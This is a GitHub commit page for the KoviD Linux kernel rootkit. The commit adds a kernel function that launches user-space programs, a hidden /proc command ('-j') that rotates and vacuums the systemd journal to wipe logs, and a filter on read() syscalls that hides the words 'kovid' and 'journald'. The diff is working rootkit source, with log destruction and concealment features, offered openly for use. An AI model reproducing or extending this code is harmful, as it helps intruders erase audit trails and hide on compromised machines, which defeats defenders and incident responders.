Add generic system command function

Also add -j for clearing journal, currently using journalctl set in Makefile Note: this is not perfect solution (as is not dmesg one) it is a high-level call, but has practicality due to being embedded in the rootkit. Unfortunately, and depending on the systemd configuration, journald will send logs to kernel's ringbuffer, for that reason I also include "journald" in the set of banned words. If it goes on dmesg, dmesg call will return 0, far from ideal behaviour but still less worse than kovid so explicitly visible. We'll go back at this at some point.
carloslack · Oct 16, 2024 · 9804476 · 9804476
1 parent 9b70cf2
commit 9804476
Show file tree

Hide file tree

Showing 6 changed files with 42 additions and 2 deletions.
diff --git a/Makefile b/Makefile
@@ -9,12 +9,13 @@ endif
 LD=$(shell which ld)
 AS=$(shell which as)
 CTAGS=$(shell which ctags))
+JOURNALCTL := $(shell which journalctl)
 UUIDGEN := $(shell uuidgen)
 
 # PROCNAME, /proc/<name> interface. You must change it.
 COMPILER_OPTIONS := -Wall -DPROCNAME='"changeme"' \
 	-DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \
-	-DUUIDGEN=\"$(UUIDGEN)\"
+	-DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\"
 
 EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}
 

diff --git a/docs/cheatsheet-proc-interface.txt b/docs/cheatsheet-proc-interface.txt
@@ -84,3 +84,9 @@
     # Or to print all tasks (hidden or not)
         $ echo -S > /proc/test
 
+#22 Clear journal
+    # May need to be called twice,
+    # until it is cleared, given vacuum limitation.
+    # check with journalctl
+    $ echo -j > /proc/test
+
diff --git a/src/kovid.c b/src/kovid.c
@@ -552,6 +552,15 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
             /* show current hidden files/directories */
         } else if(!strcmp(buf, "-l")) {
             fs_list_names();
+            /* clear journal
+             * May have to be called more than once
+             * */
+        } else if(!strcmp(buf, "-j")) {
+            char *cmd[] = {JOURNALCTL, "--rotate", NULL};
+            if (!kv_run_system_command(cmd)) {
+                cmd[1] = "--vacuum-time=1s";
+                kv_run_system_command(cmd);
+            }
             /* fetch base address of process */
         } else if (!strncmp(buf, "-b", MIN(2, size))) {
             char *tmp = &buf[3];

diff --git a/src/lkm.h b/src/lkm.h
@@ -163,6 +163,7 @@ int kv_is_proc_interface_loaded(void);
 
 /** whatever */
 char *kv_util_random_AZ_string(size_t);
+int kv_run_system_command(char **);
 
 /** VM operations */
 unsigned long kv_get_elf_vm_start(pid_t);

diff --git a/src/sys.c b/src/sys.c
@@ -244,7 +244,8 @@ static asmlinkage long m_read(struct pt_regs *regs) {
 
     arg = (const char __user*)PT_REGS_PARM2(regs);
     if (!copy_from_user((void *)buf, (void *)arg, size)) {
-        char *dest = strstr(buf, "kovid");
+        char *dest = (strstr(buf, "kovid") ||
+                strstr(buf, "journald"));
         if (!dest)
             goto out;
 

diff --git a/src/util.c b/src/util.c
@@ -14,6 +14,7 @@
 #include <linux/slab.h>
 #include <linux/random.h>
 #include "lkm.h"
+#include "fs.h"
 
 /**
  * This function allocates dynamic memory
@@ -47,3 +48,24 @@ char *kv_util_random_AZ_string(size_t size) {
     return buf;
 }
 
+int kv_run_system_command(char *cmd[]) {
+    struct kstat stat;
+    struct subprocess_info *info;
+    int rv = -1;
+
+    if (!cmd)
+        return rv;
+
+    if (fs_file_stat(cmd[0], &stat)) {
+        prerr("%s: not found\n", cmd[0]);
+    } else {
+        if ((info = call_usermodehelper_setup(cmd[0], cmd, NULL,
+                        GFP_KERNEL, NULL, NULL, NULL))) {
+            rv = call_usermodehelper_exec(info, UMH_WAIT_EXEC);
+            if (rv)
+                prerr("Error running %s\n", cmd[0]);
+        }
+    }
+
+    return rv;
+}